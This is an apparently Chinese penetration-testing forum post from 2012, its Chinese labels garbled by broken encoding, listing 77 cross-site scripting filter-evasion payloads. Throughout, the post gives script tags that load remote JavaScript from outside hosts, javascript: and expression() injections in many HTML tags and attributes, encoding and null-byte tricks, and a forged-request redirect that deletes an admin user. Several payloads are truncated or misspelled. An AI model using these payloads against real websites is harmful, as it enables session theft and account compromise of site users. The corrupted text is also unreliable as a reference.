��̳ › web app��͸����::��Web App penetration testing�� › xss��վ�ű���������

admin ������ 2012-9-5 14:56:34

xss��վ�ű���������

ò�ƹ���xss������t00ls�Ƚ��٣������ö���Copy��������֪����ľ��ͯЬ��ҪMark�ġ�

(1)��ͨ��XSS JavaScriptע��
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG��ǩXSSʹ��JavaScript����
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG��ǩ�޷ֺ�������
<IMG SRC=javascript:alert(��XSS��)>

(4)IMG��ǩ��Сд������
<IMG SRC=JaVaScRiPt:alert(��XSS��)>

(5)HTML����(�����зֺ�)
<IMG SRC=javascript:alert(��XSS��)>

(6)����ȱ��IMG��ǩ
<IMG ����"><SCRIPT>alert(��XSS��)</SCRIPT>��>

(7)formCharCode��ǩ(������)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8��Unicode����(������)
<IMG SRC=jav..ʡ��..S')>

(9)7λ��UTF-8��Unicode������û�зֺŵ�(������)
<IMG SRC=jav..ʡ��..S')>

(10)ʮ�����Ʊ���Ҳ��û�зֺ�(������)
<IMG SRC=&#x6A&#x61&#x76&#x61..ʡ��..&#x58&#x53&#x53&#x27&#x29>

(11)Ƕ��ʽ��ǩ,��Javascript�ֿ�
<IMG SRC=��jav ascript:alert(��XSS��);��>

(12)Ƕ��ʽ�����ǩ,��Javascript�ֿ�
<IMG SRC=��jav ascript:alert(��XSS��);��>

(13)Ƕ��ʽ���з�
<IMG SRC=��jav ascript:alert(��XSS��);��>

(14)Ƕ��ʽ�س�
<IMG SRC=��jav ascript:alert(��XSS��);��>

(15)Ƕ��ʽ����ע��JavaScript,����XSS���˵�����
<IMG SRC=��javascript:alert(��XSS��)��>

(16)��������ַ�(Ҫ��ͬҳ��)
<script>z=��document.��</script>
<script>z=z+��write(����</script>
<script>z=z+��<script��</script>
<script>z=z+�� src=ht��</script>
<script>z=z+��tp://ww��</script>
<script>z=z+��w.shell��</script>
<script>z=z+��.net/1.��</script>
<script>z=z+��js></sc��</script>
<script>z=z+��ript>��)��</script>
<script>eval_r(z)</script>

(17)���ַ�
perl -e ��print ��<IMG SRC=java\0script:alert(\��XSS\��)>��;�� > out

(18)���ַ�2,���ַ��ڹ��ڻ���ûЧ��.��Ϊû�еط���������
perl -e ��print ��<SCR\0IPT>alert(\��XSS\��)</SCR\0IPT>��;�� > out

(19)Spaces��metaǰ��IMG��ǩ
<IMG SRC=�� javascript:alert(��XSS��);��>

(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=��http://3w.org/XSS/xss.js��></SCRIPT>

(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(��XSS��)>

(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=��http://3w.org/XSS/xss.js��></SCRIPT>

(23)˫������
<<SCRIPT>alert(��XSS��);//<</SCRIPT>

(24)�޽����ű����(������������)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)�޽����ű����2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)�뿪��HTML/JavaScript XSS
<IMG SRC=��javascript:alert(��XSS��)��

(27)˫��������
<iframe src=http://3w.org/XSS.html <

(28)�޵����� ˫���� �ֺ�
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29)������˵�JavaScript
\��;alert(��XSS��);//

(30)����Title��ǩ
</TITLE><SCRIPT>alert(��XSS��);</SCRIPT>

(31)Input Image
<INPUT SRC=��javascript:alert(��XSS��);��>

(32)BODY Image
<BODY BACKGROUND=��javascript:alert(��XSS��)��>

(33)BODY��ǩ
<BODY(��XSS��)>

(34)IMG Dynsrc
<IMG DYNSRC=��javascript:alert(��XSS��)��>

(35)IMG Lowsrc
<IMG LOWSRC=��javascript:alert(��XSS��)��>

(36)BGSOUND
<BGSOUND SRC=��javascript:alert(��XSS��);��>

(37)STYLE sheet
<LINK REL=��stylesheet�� HREF=��javascript:alert(��XSS��);��>

(38)Զ����ʽ��
<LINK REL=��stylesheet�� HREF=��http://3w.org/xss.css��>

(39)List-style-image(�б�ʽ)
<STYLE>li {list-style-image: url(��javascript:alert(��XSS��)��);}</STYLE><UL><LI>XSS

(40)IMG VBscript
<IMG SRC=��vbscript:msgbox(��XSS��)��></STYLE><UL><LI>XSS

(41)META����url
<META HTTP-EQUIV=��refresh�� CONTENT=��0; URL=http://;URL=javascript:alert(��XSS��);��>

(42)Iframe
<IFRAME SRC=��javascript:alert(��XSS��);��></IFRAME>

(43)Frame
<FRAMESET><FRAME SRC=��javascript:alert(��XSS��);��></FRAMESET>

(44)Table
<TABLE BACKGROUND=��javascript:alert(��XSS��)��>

(45)TD
<TABLE><TD BACKGROUND=��javascript:alert(��XSS��)��>

(46)DIV background-image
<DIV STYLE=��background-image: url(javascript:alert(��XSS��))��>

(47)DIV background-image����϶����ַ�(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE=��background-image: url(
javascript:alert(��XSS��))��>

(48)DIV expression
<DIV STYLE=��width: expression_r(alert(��XSS��));��>

(49)STYLE���Էֲ����
<IMG STYLE=��xss:expression_r(alert(��XSS��))��>

(50)����STYLE(���:���Ǻź�һ����ĸ��ͷ)
<XSS STYLE=��xss:expression_r(alert(��XSS��))��>

(51)STYLE background-image
<STYLE>.XSS{background-image:url(��javascript:alert(��XSS��)��);}</STYLE><A CLASS=XSS></A>

(52)IMG STYLE��ʽ
exppression(alert(��XSS��))��>

(53)STYLE background
<STYLE><STYLE type=��text/css��>BODY{background:url(��javascript:alert(��XSS��)��)}</STYLE>

(54)BASE
<BASE HREF=��javascript:alert(��XSS��);//��>

(55)EMBED��ǩ,�����Ƕ��FLASH,���а���XSS
<EMBED SRC=��http://3w.org/XSS/xss.swf�� ></EMBED>

(56)��flash��ʹ��ActionScrpt���Ի����XSS�Ĵ���
a=��get��;
b=��URL(\��";
c=��javascript:��;
d=��alert(��XSS��);\��)��;
eval_r(a+b+c+d);

(57)XML namespace.HTC�ļ���������XSS������һ̨��������
<HTML xmlns:xss>
<?import namespace=��xss�� implementation=��http://3w.org/XSS/xss.htc��>
<xss:xss>XSS</xss:xss>
</HTML>

(58)������������JS�������ͼƬ������JS����������
<SCRIPT SRC=����></SCRIPT>

(59)IMGǶ��ʽ����,��ִ����������
<IMG SRC=��http://www.XXX.com/a.php?a=b��>

(60)IMGǶ��ʽ����(a.jpg��ͬ������)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)�Ʒ��Ź���
<SCRIPT a=��>�� SRC=��http://3w.org/xss.js��></SCRIPT>

(62)
<SCRIPT =��>�� SRC=��http://3w.org/xss.js��></SCRIPT>

(63)
<SCRIPT a=��>�� �� SRC=��http://3w.org/xss.js��></SCRIPT>

(64)
<SCRIPT ��a=��>���� SRC=��http://3w.org/xss.js��></SCRIPT>

(65)
<SCRIPT a=`>` SRC=��http://3w.org/xss.js��></SCRIPT>

(66)
<SCRIPT a=��>��>�� SRC=��http://3w.org/xss.js��></SCRIPT>

(67)
<SCRIPT>document.write(��<SCRI��);</SCRIPT>PT SRC=��http://3w.org/xss.js��></SCRIPT>

(68)URL����
<A HREF=��http://127.0.0.1/��>XSS</A>

(69)URL����
<A HREF=��http://3w.org��>XSS</A>

(70)IPʮ����
<A HREF=��http://3232235521��>XSS</A>

(71)IPʮ������
<A HREF=��http://0xc0.0xa8.0��00.0��01��>XSS</A>

(72)IP�˽���
<A HREF=��http://0300.0250.0000.0001��>XSS</A>

(73)��ϱ���
<A HREF=��h
tt p://6 6.000146.0��7.147/��">XSS</A>

(74)��ʡ
<A HREF=��//www.google.com/��>XSS</A>

(75)��ʡ
<A HREF=��http://google.com/��>XSS</A>

(76)���Ե����DNS
<A HREF=��http://www.google.com./��>XSS</A>

(77)javascript����
<A HREF=��javascript:document.location=��http://www.google.com/����>XSS</A>

�鿴�����汾: xss��վ�ű���������